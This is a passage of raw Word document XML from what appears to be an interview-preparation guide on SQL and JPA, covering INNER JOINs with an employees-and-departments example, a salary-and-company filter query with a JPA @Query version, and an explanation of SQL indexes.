      </w:r>
    </w:p>
    <w:p w14:paraId="772AD2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40D7C1F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table2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303912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1.column_name = table2.column_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187DDBD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2F67C8F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ECT columns</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the columns that you want to retrieve from both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B95308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ROM table1</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The first table (the left table in the join).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6573767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 table2</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The second table (the right table in the join).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1995BC9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N table1.column_name = table2.column_name</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The condition that defines how to match rows from the two tables, typically based on a common column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20715150"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6493D1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ider two tables: employees and departments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9325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85313D" w:rsidRPr="0085313D" w14:paraId="7EB5AD5F" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05CDC433"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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41EC84A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29AA20B6"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r>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="14CDC8FE" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AC90BC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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD49081"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4EB87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r w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="3BA7181B" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35A466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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EFA5F9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63288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r>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="5995FD5A" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14548AF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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A64FB2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5F04E36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r>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="0848242D" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A25525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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34D4BBF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603C66F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bl>
    <w:p w14:paraId="52A076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partment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795"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="5B783657" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70E1FC5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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="289AF36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8E9A991" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DC9A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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B2C2DE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28D40558" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="171B17C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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="056C5A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DAB7A68" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68DDCD1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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2012008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bl>
    <w:p w14:paraId="6683E48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want to retrieve the employee names along with their department names, you can use an INNER JOIN between the employees and departments tables based on the department_id column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE3463D"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Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A96A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loyee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F41A41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 e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5440B4A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INNER JOIN departments d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515F9AF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department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC92BA8"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85313D" w:rsidRPr="0085313D" w14:paraId="45F662A7" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F9CA6C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47B6AC22"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C8E6B54" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1833736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08DE8B3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7B65033E" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EB86CE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435B4C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086F934" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D3A504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71262C8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r w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="1C5A89D5" w14:textId="77777777" w:rsidTr="00185F20">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="351328B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3B0DD2B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bl>
    <w:p w14:paraId="58667CCE"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECECF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query performs an INNER JOIN between the employees table (aliased as e) and the departments table (aliased as d).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE6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matches rows from the two tables where the department_id column in employees matches the department_id column in departments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F59A8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only include employees who have a matching department in the departments table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E36D71C"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68E7166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atching rows</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only the rows with matching values in both tables are returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04524C7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 matching rows</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If there is no matching row in either of the tables, that record is excluded from the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C918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r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: INNER JOINs are generally fast, but performance can depend on the database and indexes on the join columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6876C9A4"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p w14:paraId="3022993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is commonly used when you want to retrieve related data from multiple tables where there is a direct relationship between them. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D418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etching customer orders and product details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A8A5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rieving user information and the roles assigned to them in a user-role relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED858B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fundamental SQL operation used to combine rows from two or more tables based on a related column, ensuring that only rows with matching data from both tables are returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF50137" w14:textId="017D139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3234" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C4966C" w14:textId="49BA7F27" w:rsidR="004B1BF8" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="775" w:name="_Toc197867989"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00185F2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85F20" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- T</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>o get emp_sal &gt; 5000 and company_name = "Kotak"</w:t>
      </w:r>
      <w:bookmarkEnd w:id="775"/>
    </w:p>
    <w:p w14:paraId="4ACB710B"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Table :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BC9B98"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1. Company</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AA1CF0"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402513CE"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69759FE6"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2. Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6084212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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F7E26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0BB47297"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1C82E" w14:textId="249CCC0C" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8" w:rsidP="004B1BF8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>- emp_sal</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF95491" w14:textId="6DFAF144" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="006B6260"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r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>nswer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F8042" w14:textId="795F53AD"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Selec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_sal</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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7839A" w14:textId="70BCF3E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From</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA88D4C" w14:textId="65952BB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ny</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604184D5" w14:textId="26BB4142"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O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id </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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A038AC7" w14:textId="3955C67A"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 xml:space="preserve">Wher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_s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0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p>
    <w:p w14:paraId="60FE7C68" w14:textId="73C63B10"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892D370">
          <v:rect id="_x0000_i3235" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="272E2B70" w14:textId="0E36A256" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="0078365A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="776" w:name="_Toc197867990"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a JPA query to retrieve the above result</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="776"/>
    </w:p>
    <w:p w14:paraId="0646BA8E" w14:textId="3B3E1361" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B19698" w14:textId="77777777"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006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Quer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LECT e.empSal, c.companyName FROM Employee e JOIN e.company c WHERE e.empSal &gt; :salary AND c.companyName = :companyName"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A69B91" w14:textId="52802658"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EmployeeSalaryAndCompanyNam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mpany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mpanyName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A3AD24" w14:textId="7B4B02C8"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3236" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="441021D8" w14:textId="7CA7792A" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="003A1A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="777" w:name="_Toc197867991"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is an index in SQL</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="777"/>
    </w:p>
    <w:p w14:paraId="35C241D4" w14:textId="013A6CB6" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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SQL Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1EDE8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D40B63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n index is primarily used to speed up query performance, especially for large tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569B737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speeds up operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELEC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clauses, where searching for rows based on specific conditions is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA4087"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ow It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A44C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atabase creates an index on a specified column or set of columns. The index contains a sorted list of values for the indexed column(s), along with pointers to the actual rows in the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD2F95"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a query is run, the database uses the index to locate the rows without scanning the entire table, improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A071DD3"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Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E10186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r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: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It ensures unique values and helps with data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85A8DF"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xml:space="preserve">: Created automatically when you define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ensuring that no two rows have the same value for the indexed column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC515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r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Created on any column to speed up query performance, even if duplicate values exist in the column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B9911B"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instead of just one) to optimize queries involving multiple columns in the WHERE clause.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5700A77A"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full-text searches to speed up searches for words in text-based columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F25D806"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dvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD3CD0"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aster Query Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Especially for SELECT queries with conditions on the indexed columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3772E13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fficient Sorting</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When sorting or ordering rows (ORDER BY), indexes help by avoiding full table scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D36B2F4"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ness</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that values in certain columns remain unique (if the index is created with a UNIQUE constraint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C086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isadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5BB92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 on Data Modification</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indexes can slow down INSERT, UPDATE, and DELETE operations because the index must also be updated whenever the table data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDBD80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 Space</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indexes consume additional disk space, and the more indexes you have, the more storage space is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC495C"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reating an Index:</w:t>
      </w:r>
    </w:p>
